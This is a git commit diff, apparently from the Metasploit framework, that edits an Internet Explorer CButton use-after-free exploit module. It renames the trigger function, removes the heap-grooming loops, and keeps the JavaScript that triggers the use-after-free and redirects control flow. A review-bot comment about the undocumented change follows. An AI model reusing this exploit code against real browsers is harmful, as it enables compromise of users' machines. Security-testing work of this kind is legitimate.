
Your def of commit apparently is a little different than mine, git.

1 parent 2b3f7c4 commit f7543e18fe735bf50f9b4127eec6dd74c0f2d2bd @sinn3r sinn3r committed Dec 31, 2012
Showing with 3 additions and 34 deletions.
  1. +3 −34 modules/exploits/windows/browser/ie_cbutton_uaf.rb
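--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info={})
 super(update_info(info,
- 'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
+ 'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
 'Description' => %q{
 This module exploits a vulnerability found in Microsoft Internet Explorer. A
 use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ def load_exploit_html(my_target, cli)
 <script>
 #{js}
- function exploit()
+ function helloWorld()
 {
 var e0 = null;
 var e1 = null;
 var e2 = null;
- var arrObject = new Array(3000);
- var elmObject = new Array(500);
- for (var i = 0; i < arrObject.length; i++)
- {
- arrObject[i] = document.createElement('div');
- arrObject[i].className = unescape("ababababababababababababababababababababa");
- }
-
- for (var i = 0; i < arrObject.length; i += 2)
- {
- arrObject[i].className = null;
- }
-
- CollectGarbage();
-
- for (var i = 0; i < elmObject.length; i ++)
- {
- elmObject[i] = document.createElement('button');
- }
-
- for (var i = 1; i < arrObject.length; i += 2)
- {
- arrObject[i].className = null;
- }
-
- CollectGarbage();
 try {
 e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ def load_exploit_html(my_target, cli)
 e2.appendChild(document.createElement('body'));
 } catch(e) { }
 CollectGarbage();
- for(var i =0; i < 20; i++)
- {
- arrObject[i].className = unescape("ababababababababababababababababababababa");
- }
 var eip = window;
 var data = "#{Rex::Text.rand_text_alpha(41)}";
 eip.location = unescape("%u0b30%u0c0c" + data);
-
 }
 </script>
 </head>
- <body onload="eval(exploit())">
+ <body onload="eval(helloWorld())">
 <form id="a">
 </form>
 <dfn id="b">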
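Review bot: Nothing in the change records why the `arrObject`/`elmObject` arrays and their loops were dropped from the script in the second and third hunks, and the replacement name `helloWorld` describes the function even less than `exploit` did. The commit title does not describe the change either, so a reader of `load_exploit_html` (whose body starts and ends outside these hunks) cannot tell whether the removal was a reliability fix, a cleanup, or an accident. A Ruby comment above the HTML template, for example `# Array pre-allocation removed in f7543e1: <reason>`, would keep that history next to the code. For anyone maintaining detections against this module's output, the function name and those loops are no longer present after this commit, so rules should not depend on them.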
